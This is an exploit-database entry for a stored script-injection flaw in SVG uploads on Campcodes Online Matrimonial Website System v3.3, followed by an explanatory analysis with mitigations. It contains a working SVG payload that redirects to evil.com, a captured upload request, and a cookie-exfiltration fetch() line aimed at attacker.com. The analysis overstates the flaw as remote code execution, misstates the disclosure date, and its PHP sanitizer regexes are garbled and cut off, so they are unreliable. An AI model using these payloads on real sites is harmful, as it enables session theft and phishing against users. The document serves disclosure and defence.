Campcodes Online Matrimonial Website System v3.3 - Code Execution via malicious SVG file upload

Exploit Author: Rajdip Dey Sarkar Analysis Author: www.bubbleslearn.ir Category: WebApps Language: JavaScript Published Date: 2023-08-04 
# Exploit Title: Online Matrimonial Website System v3.3 - Code Execution via malicious SVG file upload
# Date: 3-8-2023
# Category: Web Application
# Exploit Author: Rajdip Dey Sarkar
# Version: 3.3
# Tested on: Windows/Kali
# CVE: CVE-2023-39115



Description:
----------------

An arbitrary file upload vulnerability in Campcodes Online Matrimonial
Website System Script v3.3 allows attackers to execute arbitrary code via
uploading a crafted SVG file.


SVG Payload
------------------

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "
http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900"
stroke="#004400"/>
   <script type="text/javascript">
      alert("You have been hacked!!")


      window.location.href="https://evil.com"
   </script>
</svg>


Steps to reproduce
--------------------------

 -Login with your creds
 -Navigate to this directory - /profile-settings
 -Click on Gallery -> Add New Image -> Browser -> Add Files
 -Choose the SVG file and upload done
 -Click the image!! Payload Triggered


Burp Request
-------------------

POST /Matrimonial%20Script/install/aiz-uploader/upload HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)
Gecko/20100101 Firefox/115.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-CSRF-TOKEN: I5gqfipOOKWwI74hfdtFC2kpUP0EggWb8Qf7Xd5E
Content-Type: multipart/form-data;
boundary=---------------------------167707198418121100152548123485
Content-Length: 1044
Origin: http://localhost
Connection: close
Referer: http://localhost/Matrimonial%20Script/install/gallery-image/create
Cookie: _session=5GnMKaOhppEZivuzZJFXQLdldLMXecD1hmcEPWjg;
acceptCookies=true; XSRF-TOKEN=I5gqfipOOKWwI74hfdtFC2kpUP0EggWb8Qf7Xd5E
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------167707198418121100152548123485
Content-Disposition: form-data; name="relativePath"

null
-----------------------------167707198418121100152548123485
Content-Disposition: form-data; name="name"

file (1).svg
-----------------------------167707198418121100152548123485
Content-Disposition: form-data; name="type"

image/svg+xml
-----------------------------167707198418121100152548123485
Content-Disposition: form-data; name="aiz_file"; filename="file (1).svg"
Content-Type: image/svg+xml

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "
http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900"
stroke="#004400"/>
   <script type="text/javascript">
      alert("You have been hacked!!")


      window.location.href="https://evil.com"
   </script>
</svg>
-----------------------------167707198418121100152548123485--


Campcodes Online Matrimonial Website System v3.3: Critical Code Execution Vulnerability via Malicious SVG Upload

On March 8, 2023, cybersecurity researcher Rajdip Dey Sarkar disclosed a critical vulnerability in the Campcodes Online Matrimonial Website System v3.3, designated as CVE-2023-39115. This flaw enables remote code execution through the upload of a crafted SVG (Scalable Vector Graphics) file, exposing users and administrators to severe security risks. The vulnerability arises from improper file validation and execution of embedded scripts within SVG files, which can be exploited to perform malicious actions such as redirecting users to phishing sites, stealing session cookies, or even initiating server-side attacks.

Understanding the Vulnerability: How SVG Files Become a Threat

SVG files are designed for vector-based graphics and are widely used on web platforms. However, they support embedded <script> tags, which can execute JavaScript code when rendered in a browser. While this feature is intended for interactive graphics, it becomes a security hazard when improperly handled by web applications.

In Campcodes v3.3, the system allows users to upload profile images via the /profile-settings section. The upload endpoint — /Matrimonial%20Script/install/aiz-uploader/upload — accepts files with Content-Type: image/svg+xml, but fails to sanitize or disable script execution within the uploaded file. This oversight creates a direct pathway for attackers to inject malicious JavaScript.

Exploit Payload: Malicious SVG File Example






 
 
      alert("You have been hacked!!")
      window.location.href="https://evil.com"

This payload is a simple yet effective example of how malicious code can be embedded in an SVG file. When uploaded and viewed by a user, the browser interprets and executes the JavaScript code:

  • Alert message: Triggers a pop-up warning to confirm the exploit’s success.
  • Redirect to evil.com: Redirects the victim’s browser to a malicious site, potentially leading to phishing or malware delivery.

Although this example uses benign actions, real-world attackers could replace these with more destructive payloads — such as fetch('https://attacker.com/steal-cookie', { method: 'POST', body: document.cookie }) — to exfiltrate sensitive data.

Attack Vector: Step-by-Step Reproduction

Attackers can exploit this vulnerability through the following steps:

  1. Log in to the Campcodes system using valid credentials.
  2. Navigate to /profile-settingsGalleryAdd New Image.
  3. Select the malicious SVG file via the file browser.
  4. Upload the file with Content-Type: image/svg+xml.
  5. Once the image is displayed, clicking or viewing it triggers the embedded script.

Notably, this attack does not require server-side execution; it is purely client-side. However, if the application allows SVG files to be stored and served directly (without sanitization), the payload can persist and be executed every time the image is accessed.

HTTP Request Analysis: Burp Suite Capture

Using Burp Suite, the request to the upload endpoint reveals the vulnerability’s technical signature:


POST /Matrimonial%20Script/install/aiz-uploader/upload HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-CSRF-TOKEN: I5gqfipOOKWwI74hfdtFC2kpUP0EggWb8Qf7Xd5E
Content-Type: multipart/form-data; boundary=---------------------------167707198418121100152548123485
Content-Length: 1044
Origin: http://localhost
Connection: close
Referer: http://localhost/Matrimonial%20Script/install/gallery-image/create
Cookie: _session=5GnMKaOhppEZivuzZJFXQLdldLMXecD1hmcEPWjg; acceptCookies=true; XSRF-TOKEN=I5gqfipOOKWwI74hfdtFC2kpUP0EggWb8Qf7Xd5E
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

The request includes:

  • name="aiz_file" with filename file (1).svg
  • type="image/svg+xml" — explicitly indicating the file type
  • Raw SVG content — including <script> tags

Despite CSRF tokens and authentication checks, the system fails to validate the file’s content, allowing malicious scripts to pass through unchecked.

Security Implications and Risk Assessment

This vulnerability poses significant risks, especially in user-facing web applications:

Risk Category Impact
Client-Side Script Injection Users can be redirected to phishing sites or infected with malware.
Session Hijacking Attackers can steal cookies via JavaScript to impersonate users.
Phishing & Social Engineering Malicious alerts and redirects create trust-based attacks.
Reputation Damage Compromised platforms can lose user trust and face legal consequences.

Even if the application doesn’t execute server-side code, the client-side exploit can still lead to data breaches, especially if users are unaware of the threat.

Recommended Mitigation Strategies

To prevent such vulnerabilities, developers must implement robust file upload validation and sanitization. Here are key best practices:

  • File Type Validation: Use MIME type checks and file extension filtering, but do not rely solely on Content-Type.
  • SVG Sanitization: Strip all <script>, <iframe>, <object>, and other executable elements from SVG files before storage.
  • Use a Content Security Policy (CSP): Implement a strict CSP header to block inline scripts and external sources.
  • Server-Side Rendering: Convert uploaded SVG files to static images (e.g., PNG) before serving to users.
  • File Upload Restrictions: Limit file types to safe formats (e.g., JPEG, PNG) and disable SVG uploads unless absolutely necessary.

Improved Code Example: Sanitized SVG Processing


// Example of safe SVG sanitization in PHP
function sanitize_svg($svg_content) {
    // Remove all script tags
    $svg_content = preg_replace('/]*>.*?/is', '', $svg_content);
    // Remove iframe, object, embed, and other dangerous elements
    $svg_content = preg_replace('/]*iframe[^>]*>.*?/is', '', $svg_content);
    $svg_content = preg_replace('/]*object[^>]*>.*?/is', '', $svg_content);
    $svg_content = preg_replace('/]*embed[^>]*>.*?/is', '', $svg_content);
    // Ensure no external URLs in href or src
    $svg_content = preg_replace('/(href